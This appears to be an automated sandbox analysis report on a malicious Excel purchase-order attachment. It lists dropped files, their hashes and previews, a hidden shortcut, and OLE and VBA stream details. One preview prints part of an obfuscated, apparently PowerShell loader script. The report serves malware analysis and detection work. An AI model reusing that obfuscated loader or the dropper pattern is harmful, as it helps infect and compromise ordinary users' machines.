                                                                            Preview:$Overofficered=$Messingflaskers;..<#Skridende Voldgifternes Holdet Kharijite himmerigsmundfuld Paraphernalian Overtallets #>..<#Sprngsikreste Farvebilleder Presentation cervix Throughcome #>..<#Monepiscopal Lnrelation Unresponsibly Dekompressionsventil Xerographer Outset #>..<#Ligbrnding Ligustrenes Snedkereres Sarkasmernes Transformism Gennembladet Attackable #>..<#Altertavlens Arsenets Indeks #>..<#Reconciliative Pimpet Efteraarene Saxonic Thornton Chumpish Reservistens #>...$Bygmestres = @'.Woyaw.Promi$ CalidTreleiR,gioaM.sogl store KartkMetabtJ gtloPetrol regeo upeg aioc= Sque$ artinKendse illau Pi,trAnx oaMe.lsdReoxi;ud ty.Noncof.eathu Shikn,runkc V umtDistri,aghjoParadn O.ga MiraS xploa dornmStr tmSidewePol.dnTapethsi,mefRetrit,nergePeramrYo.im Skos(ghoul$ PaasV.aturiFollosTelefeGen er Nethe Ekstd ugeneTematsMekan, Resu$.isefPPresyoHotpllGdnineSinkem murro WintnPol oiUgleruAnomamBefor)Parag ri sw{Resho.Shoya.Tnkem$PropoOKammep Ru kvA chskSeneskSylloeMindstVivis1Carri4vandd9Str

                                                                            C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet\brkops.ind

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):385193
                                                                            Entropy (8bit):1.2513468259126719
                                                                            Encrypted:false
                                                                            SSDEEP:768:aEMZI3FIfIoASNikk5oeF4qQ7kjt8IrwghWyIgttkVVaxtWJjwHwUZJLPS/UpQFs:4IM85MQZxPWpILCm58b9QeiKhsRR7U
                                                                            MD5:C73A822A5DC42DEF82529419505D4D34
                                                                            SHA1:2F09CC0773FD145E60C4C20F9B8085624D0960A6
                                                                            SHA-256:99EECD9B8808E7B171AE3B9E08B1EFE75CBA0BAFDE4ECF1D240A2BA1F28EC637
                                                                            SHA-512:C6AAE8D60B43A7D7D1C287F70D91B35E914B0B4C53449B34D3E9D773C7909395755D9266FC4BA88648BC4E94614E550877D1DF54CB7547274D3EEA35ECFAA910
                                                                            Malicious:false
                                                                            Preview:........].........................................................$.....$.........................................................................................(..........................................................9..........................s...............................................................................................................................................................................A............................................................~................................F...B........s.....................................X...?.....................M.......................I..................................................................................................SJ............3.K.......M.........................................................................................................................................................7....._.................................E............................................K..................

                                                                            C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet\dumrians.und

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):413966
                                                                            Entropy (8bit):1.2545701143598162
                                                                            Encrypted:false
                                                                            SSDEEP:1536:b2T3E/ySYfBk8nalEPTUh6Va4fPKCPdsqNQj:ij9fBk8alsUhH8js6c
                                                                            MD5:2563D98DE6469D9979963EFD8D66736D
                                                                            SHA1:4D98E68617BE777AB97514BDF59CA98AA1102C5F
                                                                            SHA-256:B7423FE1148A2EA0E5BDE3855DFAB272400202AD01A2402F76E6E5F7DD5E0AE5
                                                                            SHA-512:C3FDB8870482B6C1A08A3088ED4539746E4F5DFAF63C8AD5F7B7873D2F3FC4FE8945493888422C487F5DB1E216A289A431890E6100A1A10C4ED6BCB2DD8CBBA4
                                                                            Malicious:false
                                                                            Preview:.....c.........../..............................u.....................................................................................h......2...............................................*...l...........................;.....................n......a......................I...........................x.;...............................................................................................................................................M....................._...............................................................+...c.....;.j........................................2.........................................................I......................................o..........d.........A.....4.....................r..........................p...........................................................T........................................................................L.......................................................G.............................,.....................

                                                                            C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Tribades.vir

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):257970
                                                                            Entropy (8bit):1.256808441775652
                                                                            Encrypted:false
                                                                            SSDEEP:1536:KcEgmiyf7PGBgwWjC81son6i0q8s0If3y:WDLGoB0q8K3
                                                                            MD5:9F966EC38C037968BA52C7C6A58EAED1
                                                                            SHA1:31BC370E88A2A10950D4C3AE24C28DF7E2D89868
                                                                            SHA-256:B4B70294B142D598F5E391EE8D371014C4AEFA8272754CE0094A8F802ADFA1DA
                                                                            SHA-512:6DE9F14B990B44336B01DF665F6D1C46B6076C10F1CC40D45DAA009110D9BA51E871599422E486E7264FE251EC560E9922CB959DAE6C6B12CC8B6AF6D720C581
                                                                            Malicious:false
                                                                            Preview:..|.....K.............................................................................................{...................................................(......................A............M......................(........W...t..............e............................................................<.....................................................................s.............................................................................................................................L.............................B............/............................................................../..............................w..[......................_.............................................................................T.............o.(....%.........................................n.........J.....................................E.....=...............................................................B......................................y...................................k....

                                                                            C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Ukr.txt

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:ASCII text, with very long lines (359), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):359
                                                                            Entropy (8bit):4.308814426836422
                                                                            Encrypted:false
                                                                            SSDEEP:6:BSX8gnAA04KQeCVNcTKwLD3YAP7bqJINNQUmAdlvKRScZRIOrSeNRRAAefDPJzMA:wdAAMAszL8vJaNFmO0RSGDHRCNYR02yR
                                                                            MD5:2F193BC3BEEF5356ACF62CB12C2C4EF8
                                                                            SHA1:6E868DFB3D7ACB1D2C56E0EFA292CD7CF0DEC661
                                                                            SHA-256:10F1E86374C489E6FFC58B8213423687440ADDC3E483F5C84BE1F34D5DA23754
                                                                            SHA-512:4D5A2B7BD1C9A034A9A481BAA6C6D5D530AF5B3F95C8B1028C4DAB96FFA6199071E30CF1EB462B790AC845AA8BEAE34A0800741FBAC10242A3F38904593200EB
                                                                            Malicious:false
                                                                            Preview:succesforfattere homogamous monkeyishly funktionsstarts phylactolaemata.sextodecimos danmarkspremiere marrietta ancience.brisks grippelike hulebeboere flovmnds retrterne,roxbury marmorgulvets apogamic delprogrammers pips,selvglad polyhistorian flunkeyish deklasserings gidjee regnskabsinformationens,plasma anstandsdamernes pompejansk afmnstre afstbningernes,

                                                                            C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Valvulate.Cru

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):358391
                                                                            Entropy (8bit):7.608272187839353
                                                                            Encrypted:false
                                                                            SSDEEP:6144:6sUrRFXb4UwLDUxrycWgPzYnSH5F5vMu9wSvgzp3EWEFAWZS67RzFEQDnaV9m:TUFyiecWgP8SZrkuC9d3EWEmU+c29m
                                                                            MD5:14C1D52F24F29389597B36DCFC90B95A
                                                                            SHA1:A2578253F17B5F0EF989965DCB74AEBB60763B2D
                                                                            SHA-256:F9B744D0223EFE3C01C94D526881A95523C2F5E457F03774DD1D661944E60852
                                                                            SHA-512:4DDE50C0B37E51B944A7A61866730E53E96773E28C35260DCAE1EB38805251C3BA8E72C5D33AE2CB8D7486A4D3C6C180EC4560E3C20A6C535CA3A70AAC158710
                                                                            Malicious:false
                                                                            Preview:............z.ZZZ....00000............................z.66.....%%%%%%%.........1....)).............................H......'..fff...*......................^.FFF...H.11.6..,......................................................D..UUUUU...rrrr............ .............>>..[.....:::::...m.......ll..............,,,,,.....__....|....S....................."".............A....22.L...I.....44.\\.............ee......&.........................[[[[........dd...h.||||................................TT..............77..z.f.f....[..........|...KK.......................$.......................!.......JJJ...........................S...............................R...""........D..........C.{.....N..dddd..==.....22.........A...........y.z.............U..**..''...............................G...S..........'..PP....MMMMMM......i.....22..........\......]...........j...............A...##...\.0........................................}.............ll........9999......................<.f...........)..........Q

                                                                            C:\Users\user\Desktop\54230000

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 08:53:41 2024, Security: 1
                                                                            Category:dropped
                                                                            Size (bytes):647168
                                                                            Entropy (8bit):7.982893970497192
                                                                            Encrypted:false
                                                                            SSDEEP:12288:F5supCImwV85Jr8BooDS560fLgp0Ua70l1IgEkdo1umdpTen267s:Xplmkqr8J34LY0/O1IgEkdYTen267
                                                                            MD5:7EFDA572816A30F414F32C5B424D1965
                                                                            SHA1:996D99E1E5BA7E34DA7DB580DC736584C283BA5F
                                                                            SHA-256:30BA7397D242A331F26E32B2C8195AC8ECA6FA07AF13253AD14E4826C79D4700
                                                                            SHA-512:27634C04513E73C0505EB724BDCDC22AB3E7FE03F31F0E165882BBB0A39686FF3BAFC0E5F00820FE9293C7406D5ADCF0121FEB8FC0D17FDC9414B2F2EB32ABC4
                                                                            Malicious:false
                                                                            Preview:......................>...................................9...................|.......~...............b.......d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...........;.......=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                            C:\Users\user\Desktop\54230000:Zone.Identifier

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:false
                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                            C:\Users\user\Desktop\PO 11001 .xls (copy)

                                                                            Download File
                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 08:53:41 2024, Security: 1
                                                                            Category:dropped
                                                                            Size (bytes):647168
                                                                            Entropy (8bit):7.982893970497192
                                                                            Encrypted:false
                                                                            SSDEEP:12288:F5supCImwV85Jr8BooDS560fLgp0Ua70l1IgEkdo1umdpTen267s:Xplmkqr8J34LY0/O1IgEkdYTen267
                                                                            MD5:7EFDA572816A30F414F32C5B424D1965
                                                                            SHA1:996D99E1E5BA7E34DA7DB580DC736584C283BA5F
                                                                            SHA-256:30BA7397D242A331F26E32B2C8195AC8ECA6FA07AF13253AD14E4826C79D4700
                                                                            SHA-512:27634C04513E73C0505EB724BDCDC22AB3E7FE03F31F0E165882BBB0A39686FF3BAFC0E5F00820FE9293C7406D5ADCF0121FEB8FC0D17FDC9414B2F2EB32ABC4
                                                                            Malicious:true
                                                                            Preview:......................>...................................9...................|.......~...............b.......d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...........;.......=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                            C:\Windows\brandbombernes.lnk

                                                                            Download File
                                                                            Process:C:\Users\user\AppData\Roaming\dllhost.exe
                                                                            File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                                                            Category:dropped
                                                                            Size (bytes):1148
                                                                            Entropy (8bit):3.1392519442107463
                                                                            Encrypted:false
                                                                            SSDEEP:12:8wl0ERYTXCG7GyuR+/fGySlIcI+q1Q1AlZw1MJEbWl5y6pLl//NJkKAB3YilMME6:84iSUqRQIScIbqabwq8WLJ1NVHAx3q
                                                                            MD5:E38CBE409E70331609E77613E9B2A8B9
                                                                            SHA1:2F215CC8C9420FD1030A3ACE58A31A4A674E45C6
                                                                            SHA-256:C0EC11F4546B3D4EBE3585E575DFAFD458EE6F107672CBD41AF2F5C1B9A4DE31
                                                                            SHA-512:DA6FB6F967B27C2F433A520DCFC2BBF3A849C7076963B4ADE2958063C2CA2932CAB282683F193F58593AB7DD7C9DE78909F2C62ACD927EDE3F5C60A3A41735A6
                                                                            Malicious:false
                                                                            Preview:L..................F........................................................c....P.O. .:i.....+00.../C:\...................L.1...........Users.8..............*.........................U.s.e.r.s.....L.1...........user.8..............*.........................A.l.b.u.s.....R.1...........AppData.<..............*.........................A.p.p.D.a.t.a.....L.1...........Local.8..............*.........................L.o.c.a.l.....J.1...........Temp..6..............*.........................T.e.m.p.....\.1...........nsmA3F.tmp..B..............*.........................n.s.m.A.3.F...t.m.p.....X.2...........cueca.Stu.@..............*.........................c.u.e.c.a...S.t.u.......6.....\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.n.s.m.A.3.F...t.m.p.\.c.u.e.c.a...S.t.u.K.C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.n.t.e.r.c.e.s.s.i.o.n.a.t.e.\.F.a.v.o.u.r.a.b.l.i.e.s.1.1.7.\.s.u.l.f.o.n.y.l.u.r.e.a.........(.................l^".`G...3..qs.........

                                                                            Static File Info

                                                                            General

                                                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun Sep 29 19:08:11 2024, Security: 1
                                                                            Entropy (8bit):7.965030858056194
                                                                            TrID:
                                                                            • Microsoft Excel sheet (30009/1) 47.99%
                                                                            • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                            File name:PO 11001 .xls
                                                                            File size:656'896 bytes
                                                                            MD5:c032108824b5b2e9075e6216300794ad
                                                                            SHA1:f7517cdb21e84b14cc8b0a6bd7de1aa2d5804568
                                                                            SHA256:eee751a9781787e72e2666b344b5262abac000f1abc8a090af60b574401e6b79
                                                                            SHA512:7c592eeb9aa0dd36677e1ef463166be848b77e5ccd36763f2a29e11e7efa1abebd8b425f595defccc378f4732bb8934f8aa15a8ad3d4056cf891dc01d4bdfc65
                                                                            SSDEEP:12288:1qOop2JIrVDhls1aZykDcnd4SpHkfGGXkZvuzP7NPO:1qP2Jabs0ykDcnRsJ0ZvGPFO
                                                                            TLSH:3BD4232E30E8C713C1879ABA4CC9249F9459FE175BB6C8AB7A8433BFD4333948C85654
                                                                            File Content Preview:........................>...................................9...................|.......~...............b.......d..............................................................................................................................................

                                                                            File Icon

                                                                            Icon Hash:276ea3a6a6b7bfbf

                                                                            Static OLE Info

                                                                            General

                                                                            Document Type:OLE
                                                                            Number of OLE Files:1

                                                                            OLE File "PO 11001 .xls"

                                                                            Indicators
                                                                            Has Summary Info:
                                                                            Application Name:Microsoft Excel
                                                                            Encrypted Document:True
                                                                            Contains Word Document Stream:False
                                                                            Contains Workbook/Book Stream:True
                                                                            Contains PowerPoint Document Stream:False
                                                                            Contains Visio Document Stream:False
                                                                            Contains ObjectPool Stream:False
                                                                            Flash Objects Count:0
                                                                            Contains VBA Macros:True
                                                                            Summary
                                                                            Code Page:1252
                                                                            Author:
                                                                            Last Saved By:
                                                                            Create Time:2006-09-16 00:00:00
                                                                            Last Saved Time:2024-09-29 18:08:11
                                                                            Creating Application:Microsoft Excel
                                                                            Security:1
                                                                            Document Summary
                                                                            Document Code Page:1252
                                                                            Thumbnail Scaling Desired:False
                                                                            Contains Dirty Links:False
                                                                            Shared Document:False
                                                                            Changed Hyperlinks:False
                                                                            Application Version:786432

                                                                            Streams with VBA

                                                                            VBA File Name: Sheet1.cls, Stream Size: 977
                                                                            General
                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                            VBA File Name:Sheet1.cls
                                                                            Stream Size:977
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db f3 3e c5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            VBA Code
                                                                            Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                            VBA File Name: Sheet2.cls, Stream Size: 977
                                                                            General
                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                            VBA File Name:Sheet2.cls
                                                                            Stream Size:977
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . c . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db f3 fb 63 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            VBA Code
                                                                            Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                            VBA File Name: Sheet3.cls, Stream Size: 977
                                                                            General
                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                            VBA File Name:Sheet3.cls
                                                                            Stream Size:977
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . / . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db f3 ea 2f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            VBA Code
                                                                            Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                            VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                            General
                                                                            Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                            VBA File Name:ThisWorkbook.cls
                                                                            Stream Size:985
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
                                                                            Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 db f3 1b 0a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            VBA Code
                                                                            Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                            Streams

                                                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                            General
                                                                            Stream Path:\x1CompObj
                                                                            CLSID:
                                                                            File Type:data
                                                                            Stream Size:114
                                                                            Entropy:4.25248375192737
                                                                            Base64 Encoded:True
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                            General
                                                                            Stream Path:\x5DocumentSummaryInformation
                                                                            CLSID:
                                                                            File Type:data
                                                                            Stream Size:244
                                                                            Entropy:2.889430592781307
                                                                            Base64 Encoded:False
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                            General
                                                                            Stream Path:\x5SummaryInformation
                                                                            CLSID:
                                                                            File Type:data
                                                                            Stream Size:200
                                                                            Entropy:3.2920681057018664
                                                                            Base64 Encoded:False
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . ] . . . . . . . . . .
                                                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                            Stream Path: MBD0001A430/\x1CompObj, File Type: data, Stream Size: 99
                                                                            General
                                                                            Stream Path:MBD0001A430/\x1CompObj
                                                                            CLSID:
                                                                            File Type:data
                                                                            Stream Size:99
                                                                            Entropy:3.631242196770981
                                                                            Base64 Encoded:False
                                                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Stream Path: MBD0001A430/Package, File Type: Microsoft Excel 2007+, Stream Size: 27478
                                                                            General
                                                                            Stream Path:MBD0001A430/Package
                                                                            CLSID:
                                                                            File Type:Microsoft Excel 2007+
                                                                            Stream Size:27478
                                                                            Entropy:7.767256957232999
                                                                            Base64 Encoded:True
                                                                            Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                            Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Stream Path: MBD0001A431/\x1Ole, File Type: data, Stream Size: 754
                                                                            General
                                                                            Stream Path:MBD0001A431/\x1Ole
                                                                            CLSID:
                                                                            File Type:data
                                                                            Stream Size:754
                                                                            Entropy:5.124908797693868
                                                                            Base64 Encoded:False
